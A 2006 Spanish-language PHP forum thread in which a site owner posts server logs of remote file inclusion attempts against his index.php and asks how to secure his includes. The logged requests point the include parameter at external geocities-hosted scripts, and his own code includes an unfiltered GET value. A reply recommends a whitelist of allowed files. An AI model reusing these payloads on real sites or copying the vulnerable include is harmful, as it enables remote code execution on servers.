Foros del Web » Programando para Internet » PHP »

Seguridad con los Includes.{(GET|POST)}

Estas en el tema de Seguridad con los Includes.{(GET|POST)} en el foro de PHP en Foros del Web. saludos a todos Ayer tuve un ataque de SPAM a mi servidor, mi proveedor me informo que tenia, era vulnerable mi web site con los ...
  #1 (permalink)  
Antiguo 19/10/2006, 09:00
Avatar de helthon  
Fecha de Ingreso: junio-2005
Ubicación: Lima
Mensajes: 549
Antigüedad: 18 años, 10 meses
Puntos: 7
Seguridad con los Includes.{(GET|POST)}

saludos a todos

Ayer tuve un ataque de SPAM a mi servidor, mi proveedor me informo que tenia, era vulnerable mi web site con los includes, motivo por el cual podian entrar y sabotear todo.

Me enviaron este reporte.

Cita:
root@dime93 [/etc/httpd/conf]# egrep -E '.*(GET|POST).*=http:\/\/.*HTTP.*'
/etc/httpd//domlogs/midominio.com.pe
81.199.61.109 - - [17/Oct/2006:22:50:09 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:53:11 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:56:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:57:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:22:57:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:23:06:34 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:08:24 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
196.207.10.102 - - [17/Oct/2006:23:09:46 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser
1.0.5)"
81.199.173.35 - - [17/Oct/2006:23:41:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:42:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:45:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
82.206.131.150 - - [17/Oct/2006:23:50:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
302 372
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)"
82.206.131.150 - - [17/Oct/2006:23:50:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
................aun hay mas de lo mismo..............
AL parecer lo que hacian : http://www.geocities.com/mmgroupcoy/baptist/baptist.txt

Creo que una vez me paso casi lo mismo http://www.forosdelweb.com/f18/comentarios-php-remote-file-inclucion-327838/

Mi codigo era:
Código PHP:
<?php
$admin 
$_GET["admin"] ;
if(
$admin == ""){
    
$admin="home";
}
?>

.............

<? include($admin.".php");?>
hay forma de como hacer, saber o tener en cuenta al momento de incluir los <? inlcude ?>

Espero sus comentarios

Por cierto lo que me hicieron es : phpscripting ?
__________________
HELTHON FUENTES
FLORERIA FLORES PERU Floresperu.com.pe
Garantizamos que cada entrega de flores será de la más alta calidad y frescura
  #2 (permalink)  
Antiguo 19/10/2006, 09:54
O_O
 
Fecha de Ingreso: enero-2002
Ubicación: Santiago - Chile
Mensajes: 34.417
Antigüedad: 22 años, 3 meses
Puntos: 129
Bueno .. esa manera de llamar a un archivo externo es muy comoda para tu programación .. pero de lo más inseguro que hay como ya has comprobado.

Como recomendación .. NUNCA inyectes directamente sobre un "include()" o función que llame a un archivo (fopen() .. readfile() .. etc) un dato que te venga en forma externa al script (por GET/POST .. ). DEBES filtrarlo.

Por ejemplo .. filtrar por expresiones regulares que se indique un nombre de archivo sólo sin http:// .. sin (..) para que no "suban" por la estructura de directorios del servidor .. etc.

Lo más sano es no complicarse con filtros que "podrían fallar" .. más bien no aceptar un nombre directo de un archivo sino un "identificador":

Código PHP:
$archivo="pordefecto.php";

if (
$_GET['seccion']=="admin"){
   
$archivo="admin.php";
}
include (
$archivo); 
O mejor con un switch() .. o con un array que contenga tu asociación identificador -> archivo que le corresponde .. etc.

Un saludo,
__________________
Por motivos personales ya no puedo estar con Uds. Fue grato haber compartido todos estos años. Igualmente los seguiré leyendo.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 05:05.